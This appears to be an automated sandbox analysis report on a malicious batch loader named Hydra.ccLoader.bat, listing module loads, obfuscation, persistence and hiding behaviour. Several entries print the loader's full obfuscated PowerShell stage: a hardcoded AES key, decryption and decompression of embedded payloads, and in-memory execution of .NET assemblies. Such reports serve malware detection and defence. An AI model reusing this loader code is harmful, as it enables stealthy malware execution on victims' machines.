Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Hydra.ccLoader.batStatic file information: File size 7306960 > 1048576
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: MzWhoQ.exe.35.drStatic PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,8_2_000001CA7D1E1E3C
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001CA7D1CA7DD push rcx; retf 003Fh8_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exeCode function: 9_3_0000017D2DD3A7DD push rcx; retf 003Fh9_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000022F4B90A7DD push rcx; retf 003Fh12_3_0000022F4B90A7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F20BA7DD push rcx; retf 003Fh14_3_00000262F20BA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1CEA7DD push rcx; retf 003Fh14_3_00000262F1CEA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_00000262F1DDA7DD push rcx; retf 003Fh14_3_00000262F1DDA7DE
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000001C115C5A7DD push rcx; retf 003Fh15_3_000001C115C5A7DE
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BB497DA7DD push rcx; retf 003Fh16_3_000001BB497DA7DE
Source: C:\Windows\System32\svchost.exeCode function: 19_3_0000023942AFA7DD push rcx; retf 003Fh19_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exeCode function: 20_3_000002234E11A7DD push rcx; retf 003Fh20_3_000002234E11A7DE
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001EF056BA7DD push rcx; retf 003Fh21_3_000001EF056BA7DE
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002287AD5A7DD push rcx; retf 003Fh22_3_000002287AD5A7DE
Source: C:\Windows\System32\svchost.exeCode function: 23_3_000001B94DA7A7DD push rcx; retf 003Fh23_3_000001B94DA7A7DE
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000002520255A7DD push rcx; retf 003Fh24_3_000002520255A7DE
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001A9EBFAA7DD push rcx; retf 003Fh25_3_000001A9EBFAA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\MzWhoQ.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\MzWhoQ.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-iM0vfZcHJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
